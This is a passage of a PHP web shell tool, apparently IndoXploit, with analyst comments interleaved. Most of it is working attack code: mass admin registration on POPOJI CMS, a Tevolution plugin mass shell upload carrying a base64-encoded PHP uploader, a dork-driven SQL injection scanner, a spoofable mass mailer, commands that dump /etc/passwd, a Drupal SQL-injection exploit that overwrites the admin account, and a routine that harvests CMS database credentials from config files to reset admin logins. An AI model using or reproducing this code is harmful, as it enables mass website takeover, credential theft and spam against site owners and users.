  1915. if($dec0d3_j3mbut['bin']){
  1916. echo "
  1917. BIN INFO : <font color=red>".$dec0d3_j3mbut['bin']."</font>|
  1918. <font color=yellow>".$dec0d3_j3mbut['bank']."</font>|
  1919. <font color=blue>".$dec0d3_j3mbut['brand']."</font>|
  1920. <font color=red>".$dec0d3_j3mbut['card_type']."</font>|
  1921. <font color=green>".$dec0d3_j3mbut['country_name']."</font><br>";
  1922. }
  1923. }
  1924. }echo'
  1925. </pre>
  1926. </div>';
  1927. }elseif($_GET['do'] == 'popoji_add_admin'){
  1928. echo '
  1929. <html>
  1930. <head>
  1931. <title>POPOJI CMS Add Admin Auto Registration</title>
  1932. <meta name="author" content="IndoXploit">
  1933. <style type="text/css">
  1934. html {
  1935. margin: 20px auto;
  1936. color: #ffffff;
  1937. }
  1938. header {
  1939. color: lime;
  1940. font-size: 35px;
  1941. margin: 10px auto;
  1942. text-align: center;
  1943. text-decoration: underline;
  1944. }
  1945. input[type=text] {
  1946. border: 1px solid #008000;
  1947. color: #7FFFFF;
  1948. width: 500px;
  1949. height: 20px;
  1950. padding-left: 5px;
  1951. margin: 5px auto;
  1952. background: transparent;
  1953. }
  1954. input[type=submit] {
  1955. border: 1px solid #008000;
  1956. color: #7FFFFF;
  1957. background: transparent;
  1958. width: 500px;
  1959. }
  1960. textarea {
  1961. background: transparent;
  1962. color: #7FFFFF;
  1963. border: 1px solid #008000;
  1964. resize: none;
  1965. width: 500px;
  1966. height: 250px;
  1967. padding-left: 5px;
  1968. margin: 5px auto;
  1969. }
  1970. a {
  1971. text-decoration: none;
  1972. color: lime;
  1973. }
  1974. a:hover {
  1975. text-decoration: underline;
  1976. }
  1977. </style>
  1978. </head>';
  1979. set_time_limit(0);
  1980. error_reporting(0);
  1981.  
  // dav: HTTP helper for the POPOJI branch. Sends a GET to $url, or a POST when $post
  // is given, and returns the response body (false if curl_exec() fails).
  //   $post - POST fields; the loose "!= null" test means an empty array or empty
  //           string is also treated as "no body".
  // Properties visible in the options below that matter for detection and triage:
  //   - cookies persist in "cookie.txt" in the working directory (on-disk artifact);
  //   - TLS peer and host verification are both switched off;
  //   - the User-Agent is read from $_SERVER['HHTP_USER_AGENT'], a key that is
  //     spelled differently from the standard HTTP_USER_AGENT.
  //     NOTE(review): that key is presumably unset, so these requests likely go out
  //     without the operator's browser string - confirm in a capture.
  1982. function dav($url, $post=null) {
  1983. $ch = curl_init();
  1984. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1985. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1986. curl_setopt($ch, CURLOPT_URL, $url);
  1987. if($post != null) {
  1988. curl_setopt($ch, CURLOPT_POST, true);
  1989. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1990. }
  1991. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  1992. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  1993. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1994. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1995. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  1996. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HHTP_USER_AGENT']);
  1997. curl_setopt($ch, CURLOPT_HEADER, 0);
  1998. return curl_exec($ch);
  // Never reached: the statement sits after the return, so the handle is not closed here.
  1999. curl_close($ch);
  2000. }
  2001.  
  // POPOJI branch, main logic. For every site in $_POST['url'] (one per CRLF-separated
  // line) the script submits the CMS's registration form with a fixed username and
  // password and an e-mail address supplied by the operator, then judges the outcome
  // from wording in the response body.
  // Indicators a site owner can check:
  //   - a CMS account whose username is "indoxploit";
  //   - POSTs to /po-admin/actregister.php in the access log.
  // Mitigation on the targeted site: turn off self-registration on the admin path or
  // put new accounts behind administrator approval, and review recently created users.
  2002. $sites = explode("\r\n", $_POST['url']);
  2003. $user = "indoxploit";
  2004. $pass = $user;
  2005. $email = htmlspecialchars($_POST['email']);
  2006. if($_POST['hajar']) {
  2007. echo "<span style='font-size: 25px; text-decoration: underline; color: lime; margin-bottom: 20px;'>Result Gannnnn</span><p>";
  // "!" binds tighter than "===", so this reads (!filter_var(...)) === false and is
  // true exactly when the address validates.
  2008. if(!filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
  2009. foreach($sites as $url) {
  2010. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
  2011. $url = "http://".$url;
  2012. } else {
  2013. $url = $url;
  2014. }
  2015. echo "[+] Nyecan -> $url<br>";
  2016. $post_register = array(
  2017. "username" => $user,
  2018. "email" => $email,
  2019. "password" => $pass,
  2020. "re-password" => $pass,
  2021. );
  2022. $register = dav("$url/po-admin/actregister.php", $post_register);
  2023. echo "[+] Register ";
  // Success is inferred from body text only: none of the failure phrases may appear
  // and one of the two success phrases must. HTTP status codes are not inspected.
  2024. if(!preg_match("/404|headers already sent|disabled for security reasons|Please type another email!/", $register) AND preg_match("/SUCCESS!!!|>Check your email for next step. Thank you!/", $register)) {
  2025. echo "<font color=lime>OK!</font><br>";
  2026. echo "[+] <font color=gold>Cek emailmu buat aktivasi</font><br>";
  2027. echo "[+] u/p: <font color=lime>$user</font><br><br>";
  // $post_login is built here but not used anywhere in the visible code.
  2028. $post_login = array(
  2029. "username" => $user,
  2030. "password" => $pass,
  2031. );
  2032. } else {
  2033. echo "<font color=red>Gagal!</font><br><br>";
  2034. }
  2035. }
  2036. } else {
  2037. echo "<font color=red>Emailmu ga valid bosss, email harus valid biar bisa masuk token registrasinyaa.</font>";
  2038. }
  2039. } else {
  // No submit flag: render the input form.
  2040. echo '
  2041. <center>
  2042. <header>POPOJI Auto Registration</header>
  2043. <form method="post">
  2044. Email: <br>
  2045. <input type="text" name="email" placeholder="email@asu.com" required><br>
  2046. Domains: <br>
  2047. <textarea name="url" placeholder="http://www.target.com"></textarea><br>
  2048. <input type="submit" name="hajar" value="Xploit!">
  2049. </form>
  2050. </center>';
  2051. }
  2052. }elseif($_GET['do'] == 'tevolution'){
  2053. echo '
  2054. <html>
  2055. <center>
  2056. <h1><strong>Tevolution Mass Upload Shell</strong></h1>
  2057. <form method="post" enctype="multipart/form-data">
  2058. Shellname: <br><input type="text" name="filename" style="width: 500px;" height="10" value="indoxploit.php.xxxjpg" required><br>
  2059. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
  2060. <input type="submit" name="exp" value="Hajar!" style="width: 500px;">
  2061. </form>';
  2062. set_time_limit(0);
  2063. error_reporting(0);
  2064.  
  2065. function buffer() {
        // Pushes pending output to the client: ob_flush() empties PHP's output
        // buffer, flush() then flushes the system write buffers. Called once per
        // target in the loop further down so results appear as they are produced.
  2066. ob_flush();
  2067. flush();
  2068. }
  2069. function curl($url, $payload) {
        // POST helper for this branch: sends $payload to $url with cURL and returns
        // the response body (string, or false on failure), closing the handle first.
        //   $url     - full URL to post to.
        //   $payload - value handed to CURLOPT_POSTFIELDS.
        // Observable behaviour for responders:
        //   - cookies are kept in 'cookie.txt', a relative path in the working directory;
        //   - TLS peer and host verification are both disabled;
        //   - the User-Agent of whoever is driving this page is copied onto the
        //     outgoing request;
        //   - redirects are followed.
  2070. $ch = curl_init();
  2071. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2072. curl_setopt($ch, CURLOPT_URL, $url);
  2073. curl_setopt($ch, CURLOPT_POST, true);
  2074. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  2075. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  2076. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  2077. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2078. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2079. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  2080. curl_setopt($ch, CURLOPT_HEADER, 0);
  2081. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  2082. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  2083. $res = curl_exec($ch);
  2084. curl_close($ch);
  2085. return $res;
  2086. }
  2087. $file = htmlspecialchars($_POST['filename']); // operator-chosen file name; HTML-escaped only
        // Analyst summary of this run ("Tevolution Mass Upload Shell"):
        //   - writes a base64-decoded PHP stub (the encoded text begins with '<?php')
        //     to indoxploit_tools/<filename> on the host running this page;
        //   - posts that file, as the field 'Filedata', to the Tevolution plugin's
        //     single-upload.php on every listed site;
        //   - then requests /wp-content/uploads/<year>/<month>/<filename> on the same
        //     site and reports it when the response contains the marker string.
        // Hunting notes: on the hosting side, a directory named 'indoxploit_tools' and
        // a 'cookie.txt' beside this script; on the receiving side, POSTs to the
        // single-upload.php path below and unexpected files in the current month's
        // uploads folder whose output contains 'IndoXploit - Auto Xploiter'.
  2088. $site = explode("\r\n", $_POST['url']);
  2089. $do = $_POST['exp'];
  2090. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  2091. if($do) {
        // Year and month of the local clock, used to build the uploads path below.
  2092. $y = date("Y");
  2093. $m = date("m");
        // Directory is created relative to the working directory; the result in
        // $idx_dir is not checked.
  2094. $idx_dir = mkdir("indoxploit_tools", 0755);
  2095. $shell = "indoxploit_tools/".$file;
  2096. $fopen = fopen($shell, "w");
  2097. fwrite($fopen, $uploader);
  2098. fclose($fopen);
  2099. foreach($site as $url) {
  2100. $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
  2101. $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
  2102. $data = array(
  2103. "Filedata" => "@$shell"
  2104. );
  2105. $curl = curl($target, $data);
  2106. if($curl) {
        // Verification fetch: a hit is reported only when the marker text is present.
  2107. $cek = file_get_contents($cek_shell);
  2108. if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
  2109. echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
  2110. }
  2111. }
  2112. buffer();
  2113. }
  2114. }
  2115. }elseif($_GET['do'] == 'sqli_scanner'){
  2116. function cover() {
        // Prints the centred banner for this branch. The credit strings it emits
        // are fixed text and can serve as content signatures for this tool.
  2117. print "<center>";
  2118. print " ****** SQL Scanner via Bing Dorker ******<br><br>";
  2119. print " ***** Coded by l0c4lh34rtz - IndoXploit *****<br><br>";
  2120. print " **** Sanjungan Jiwa - Jancok Sec - Res7ock Crew ****<br><br>";
  2121. print "</center>";
  2122. }
  2123. cover(); // banner first, then the search form
        // Analyst summary of this run ("SQL Scanner via Bing Dorker"):
        //   - takes a search query from the form and pages through Bing result pages
        //     (offset grows by 10 per request, capped at 30000), collecting result links;
        //   - keeps one link per host, using $_SESSION keys to remember hosts already seen;
        //   - passes each remaining link to inject() and, on a match, records it
        //     with simpen().
        // The $error[] entries assigned after the loop are the database and PHP
        // error-message fragments that inject() looks for in responses.
        // Defensive takeaway: every fragment in that list is text an application
        // only exposes when it prints raw errors to visitors.
  2124. echo '<center>
  2125. <form method="post" action="">
  2126. Dork: <input type="text" name="dork" placeholder=\'"page.php?id=1" site:it\' style="width: 300px; height: 25px;">
  2127. <input type="submit" value=">>" name="submit">
  2128. </form>
  2129. </center>';
  2130. $dork = htmlspecialchars($_POST['dork']);
  2131. $do = urlencode($dork);
  2132. if(isset($_POST['submit'])) {
  2133. $npage = 1;
  2134. $npages = 30000;
  2135. $allLinks = array();
  2136. $lll = array();
  2137. while($npage <= $npages) {
  2138. $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
  2139. if($x) {
        // Result links are pulled out of the page markup with a fixed pattern.
  2140. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  2141. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  2142. $npage = $npage + 10;
        // Stop when the page holds no link to the next offset.
  2143. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  2144. } else break;
  2145. }
  2146. foreach($allLinks as $url) {
  2147. $urls = parse_url($url, PHP_URL_HOST);
  2148. $urls = "http://$urls/";
        // A host already marked in the session is skipped.
  2149. if($_SESSION[$urls]) {
  2150. //
  2151. } else {
  2152. $_SESSION[$urls] = "1";
  2153. if(inject($url)) {
  2154. echo " $url -> Vuln!!<br>";
  2155. simpen($url);
  2156. }
  2157. }
  2158. }
  2159. }
  2160. $error[] = 'You have an error in your SQL';
  2161. $error[] = 'supplied argument is not a valid MySQL result resource in';
  2162. $error[] = 'Division by zero in';
  2163. $error[] = 'Call to a member function';
  2164. $error[] = 'Microsoft JET Database';
  2165. $error[] = 'ODBC Microsoft Access Driver';
  2166. $error[] = 'Microsoft OLE DB Provider for SQL Server';
  2167. $error[] = 'Unclosed quotation mark';
  2168. $error[] = 'Microsoft OLE DB Provider for Oracle';
  2169. $error[] = 'Incorrect syntax near';
  2170. $error[] = 'SQL query failed';
  2171. $error[] = 'Warning: filesize()';
  2172. $error[] = 'Warning: preg_match()';
  2173. $error[] = 'Warning: array_merge()';
  2174. $error[] = 'Warning: mysql_query()';
  2175. $error[] = 'Warning: mysql_num_rows()';
  2176. $error[] = 'Warning: session_start()';
  2177. $error[] = 'Warning: getimagesize()';
  2178. $error[] = 'Warning: mysql_fetch_array()';
  2179. $error[] = 'Warning: mysql_fetch_assoc()';
  2180. $error[] = 'Warning: is_writable()';
  2181. $error[] = 'Warning: Unknown()';
  2182. $error[] = 'Warning: mysql_result()';
  2183. $error[] = 'Warning: pg_exec()';
  2184. $error[] = 'Warning: require()';
  2185.  
  2186. function getsource($url) {
        // Fetches $url with cURL and returns the response body (string, or false on
        // failure). Only RETURNTRANSFER is set; every other cURL option is left at
        // its default.
  2187. $curl = curl_init($url);
  2188. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2189. $content = curl_exec($curl);
  2190. curl_close($curl);
  2191. return $content;
  2192. }
  2193. function inject($url) {
        // Error-based probe: inserts a single quote after every '=' in $url, fetches
        // the result with getsource(), and returns preg_match()'s result for the
        // response against all $GLOBALS['error'] fragments joined with '|'
        // (case-insensitive).
        // In server logs this shows up as requests whose query values begin with a
        // stray quote; a site that never echoes raw database or PHP error text to
        // visitors gives this check nothing to match.
  2194. $data = getsource(str_replace("=", "='", $url));
  2195. $errors = implode("|", $GLOBALS['error']);
  2196. return preg_match("#{$errors}#i", $data);
  2197. }
  2198. function simpen($isi) {
        // Appends "$isi<br>" to 'result_sql.txt', a relative path, so the file
        // accumulates in the script's working directory. Its presence on a host is
        // a trace that this scanner branch was run there.
  2199. $f = fopen("result_sql.txt","a+");
  2200. fwrite($f, "$isi<br>");
  2201. fclose($f);
  2202. }
  2203. }elseif($_GET['do'] == 'mass_mail'){
  2204. if(isset($_POST['send'])){ $email = $_POST['email'];$subject = $_POST['subject'];$from = $_POST['fromEmail'];$message = $_POST['message'];if($email&&$subject&&$from&&$message){$emails = explode(";", $email);foreach($emails as $email){mail($email, $subject, $message, "From: ".$from); }}}
        // The statement above is the whole "Mass Mailer": when all four POST fields
        // are non-empty it splits the recipient field on ';' and calls mail() once
        // per address, with the subject, body and From header taken verbatim from
        // the request. Nothing is validated or rate-limited.
        // Responder notes: the mail leaves through the host's own mail transport
        // under the web server account, so outbound-mail volume from that account
        // and PHP's mail.log / mail.add_x_header settings are the places to look
        // for evidence of use.
        // The echo below only renders the input form.
  2205. echo '
  2206. <center><strong>Mass Mailer</strong></center>
  2207. <center><p>Selamat Menggunakan Ndan ^_^</p></center>
  2208. <form action="" method="post">
  2209. <table align="center">
  2210. <tr>
  2211. <td>To Email(s) : &nbsp;</td>
  2212. <td><input type="text" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; width:220px;" name="email" placeholder="email@address.com" />
  2213. </tr>
  2214. <tr>
  2215. <td>Subject : &nbsp;</td>
  2216. <td>
  2217. <input type="text" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px" name="subject" />
  2218. </td>
  2219. </tr>
  2220. <tr><td>From Email : &nbsp;</td><td><input type="email" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px;" name="fromEmail" placeholder="example@google.com" /></td>
  2221. </tr>
  2222. <tr><td>Message : &nbsp;</td><td></td></tr>
  2223. </table>
  2224. <table align="center">
  2225. <tr><td>
  2226. <textarea style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; height:200px;width:290px;" name="message"></textarea>
  2227. </td></tr>
  2228. <tr><td><input type="submit" name="send" value="Send Message(s)" /></td></tr>
  2229. </table>
  2230. </form>';
  2231. }elseif($_GET['do'] == 'etcpler'){
  2232. echo "<center>Bypass etc/passw With:<br>
  2233. <table style='width:50%' align='center'>
  2234. <tr>
  2235. <td><form method='post'><input type='submit' value='System Function' name='syst'></form></td>
  2236. <td><form method='post'><input type='submit' value='Passthru Function' name='passth'></form></td>
  2237. <td><form method='post'><input type='submit' value='Exec Function' name='ex'></form></td>
  2238. <td><form method='post'><input type='submit' value='Shell_exec Function' name='shex'></form></td>
  2239. <td><form method='post'><input type='submit' value='Posix_getpwuid Function' name='melex'></form></td>
  2240. </tr></table><center>Bypass User With : <table style='width:50%' align='center'>
  2241. <tr>
  2242. <td><form method='post'><input type='submit' value='Awk Program' name='awkuser'></form></td>
  2243. <td><form method='post'><input type='submit' value='System Function' name='systuser'></form></td>
  2244. <td><form method='post'><input type='submit' value='Passthru Function' name='passthuser'></form></td>
  2245. <td><form method='post'><input type='submit' value='Exec Function' name='exuser'></form></td>
  2246. <td><form method='post'><input type='submit' value='Shell_exec Function' name='shexuser'></form></td>
  2247. </tr>
  2248. </table></center><br>";
  2249. if ($_POST['awkuser']) {
  2250. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  2251. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  2252. echo "</textarea><br>";
  2253. }
  2254. if ($_POST['systuser']) {
  2255. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  2256. echo system("ls /var/mail");
  2257. echo "</textarea><br>";
  2258. }
  2259. if ($_POST['passthuser']) {
  2260. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  2261. echo passthru("ls /var/mail");
  2262. echo "</textarea><br>";
  2263. }
  2264. if ($_POST['exuser']) {
  2265. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  2266. echo exec("ls /var/mail");
  2267. echo "</textarea><br>";
  2268. }
  2269. if ($_POST['shexuser']) {
  2270. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  2271. echo shell_exec("ls /var/mail");
  2272. echo "</textarea><br>";
  2273. }
  2274. if($_POST['syst'])
  2275. {
  2276. echo"<textarea class='inputz' cols='65' rows='15'>";
  2277. echo system("cat /etc/passwd");
  2278. echo"</textarea><br><br><b></b><br>";
  2279. }
  2280. if($_POST['passth'])
  2281. {
  2282. echo"<textarea class='inputz' cols='65' rows='15'>";
  2283. echo passthru("cat /etc/passwd");
  2284. echo"</textarea><br><br><b></b><br>";
  2285. }
  2286. if($_POST['ex'])
  2287. {
  2288. echo"<textarea class='inputz' cols='65' rows='15'>";
  2289. echo exec("cat /etc/passwd");
  2290. echo"</textarea><br><br><b></b><br>";
  2291. }
  2292. if($_POST['shex'])
  2293. {
  2294. echo"<textarea class='inputz' cols='65' rows='15'>";
  2295. echo shell_exec("cat /etc/passwd");
  2296. echo"</textarea><br><br><b></b><br>";
  2297. }
  2298. echo '<center>';
  2299. if($_POST['melex'])
  2300. {
  2301. echo"<textarea class='inputz' cols='65' rows='15'>";
  2302. for($uid=0;$uid<60000;$uid++){
  2303. $ara = posix_getpwuid($uid);
  2304. if (!empty($ara)) {
  2305. while (list ($key, $val) = each($ara)){
  2306. print "$val:";
  2307. }
  2308. print "\n";
  2309. }
  2310. }
  2311. echo"</textarea><br><br>";
  2312. }
  2313. }elseif($_GET['do'] == 'drupal') {
  2314. echo ' <!Doctype HTML>
  2315. <html>
  2316. <head>
  2317. <title>Drupal Exploit</title>
  2318. <style type="text/css">
  2319. .mymargin{
  2320. margin-top:30px;
  2321. font-family: monospace;
  2322. }
  2323. body, html {
  2324. text-align: center;
  2325. color: #008000;
  2326. margin: 10px auto;
  2327. }
  2328. a {
  2329. color: lime;
  2330. text-decoration: none;
  2331. }
  2332. </style>
  2333. </head>
  2334. <body>
  2335. <h6>Drupal Mass Xploiter</h6>
  2336. <center>
  2337. <div class="mymargin">
  2338. <center>
  2339. <form method="POST" action="">
  2340. <font color="#008000">Target :</font> <br>
  2341. <textarea name="url" placeholder="Example: www.site.com" style="resize: none; border: 1px solid green; color: #bb0000; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
  2342. <input style="border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
  2343. </form>
  2344. <br>';
  2345. error_reporting(0);
  2346. $submit = $_POST['submit'];
  2347. $url = explode("\r\n", $_POST['url']);
  2348. if($submit) {
  2349. foreach($url as $sites) {
  2350. $log = "/user/login";
  2351. $holako = "/?q=user";
  2352. $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  2353. $params = array(
  2354. 'http' => array(
  2355. 'method' => 'POST',
  2356. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  2357. 'content' => $post_data
  2358. )
  2359. );
  2360. $ctx = stream_context_create($params);
  2361. $data = file_get_contents($sites . '/user/login/', null, $ctx);
  2362. echo "<u>Testing user/login</u><br>";
  2363. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  2364. echo "Scanning: <font color=lime>$sites</font><br>";
  2365. echo "Status: Successfully Xploited!<br>";
  2366. echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
  2367. echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
  2368. } else {
  2369. echo "Scanning: <font color=lime>$sites</font><br>";
  2370. echo "Status: <font color=red>Not Xploited!</font><br><br>";
  2371. }
  2372. }
  2373. }
  2374. if($submit) {
  2375. foreach($url as $sites) {
  2376. $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  2377. $params = array(
  2378. 'http' => array(
  2379. 'method' => 'POST',
  2380. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  2381. 'content' => $post_data
  2382. )
  2383. );
  2384. $ctx = stream_context_create($params);
  2385. $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
  2386. echo '<u>Testing at Index</u><br>';
  2387. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  2388. echo "Scanning: <font color=lime>$sites</font><br>";
  2389. echo "Status: Successfully Xploited!<br>";
  2390. echo "Data => user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
  2391. echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
  2392. } else {
  2393. echo "Scanning: <font color=lime>$sites</font><br>";
  2394. echo "Status: <font color=red>Not Xploited!</font><br><br>";
  2395. }
  2396. }
  2397. }
  2398. echo '</div>';
  2399.  
  2400. $Drupal = $_POST['Drupal'];
  2401.  
  2402.  
  2403. if($Drupal == 'Drupal') {
  2404.  
  2405. $filename = $_FILES['file']['name'];
  2406. $filetmp = $_FILES['file']['tmp_name'];
  2407.  
  2408. echo '<form method="POST" enctype="multipart/form-data">
  2409. <input type="file" name="file" />
  2410. <input type="submit" value="go" />
  2411.  
  2412. </form>';
  2413. move_uploaded_file($filetmp,$filename);
  2414. }
  2415. echo'
  2416. </body>
  2417. </html>';
  2418. }elseif($_GET['do'] == 'auto_edit_user') {
  2419. if($_POST['hajar']) {
  2420. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2421. echo "username atau password harus lebih dari 6 karakter";
  2422. } else {
  2423. $user_baru = $_POST['user_baru'];
  2424. $pass_baru = md5($_POST['pass_baru']);
  2425. $conf = $_POST['config_dir'];
  2426. $scan_conf = scandir($conf);
  2427. foreach($scan_conf as $file_conf) {
  2428. if(!is_file("$conf/$file_conf")) continue;
  2429. $config = file_get_contents("$conf/$file_conf");
  2430. if(preg_match("/JConfig|joomla/",$config)) {
  2431. $dbhost = ambilkata($config,"host = '","'");
  2432. $dbuser = ambilkata($config,"user = '","'");
  2433. $dbpass = ambilkata($config,"password = '","'");
  2434. $dbname = ambilkata($config,"db = '","'");
  2435. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2436. $prefix = $dbprefix."users";
  2437. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2438. $db = mysql_select_db($dbname);
  2439. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2440. $result = mysql_fetch_array($q);
  2441. $id = $result['id'];
  2442. $site = ambilkata($config,"sitename = '","'");
  2443. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2444. echo "Config => ".$file_conf."<br>";
  2445. echo "CMS => Joomla<br>";
  2446. if($site == '') {
  2447. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2448. } else {
  2449. echo "Sitename => $site<br>";
  2450. }
  2451. if(!$update OR !$conn OR !$db) {
  2452. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2453. } else {
  2454. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2455. }
  2456. mysql_close($conn);
  2457. } elseif(preg_match("/WordPress/",$config)) {
  2458. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2459. $dbuser = ambilkata($config,"DB_USER', '","'");
  2460. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2461. $dbname = ambilkata($config,"DB_NAME', '","'");
  2462. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2463. $prefix = $dbprefix."users";
  2464. $option = $dbprefix."options";
  2465. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2466. $db = mysql_select_db($dbname);
  2467. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2468. $result = mysql_fetch_array($q);
  2469. $id = $result[ID];
  2470. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2471. $result2 = mysql_fetch_array($q2);
  2472. $target = $result2[option_value];
  2473. if($target == '') {
  2474. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2475. } else {
  2476. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2477. }
  2478. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2479. echo "Config => ".$file_conf."<br>";
  2480. echo "CMS => Wordpress<br>";
  2481. echo $url_target;
  2482. if(!$update OR !$conn OR !$db) {
  2483. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2484. } else {
  2485. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2486. }
  2487. mysql_close($conn);
  2488. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2489. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2490. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2491. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2492. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2493. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2494. $prefix = $dbprefix."admin_user";
  2495. $option = $dbprefix."core_config_data";
  2496. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2497. $db = mysql_select_db($dbname);
  2498. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
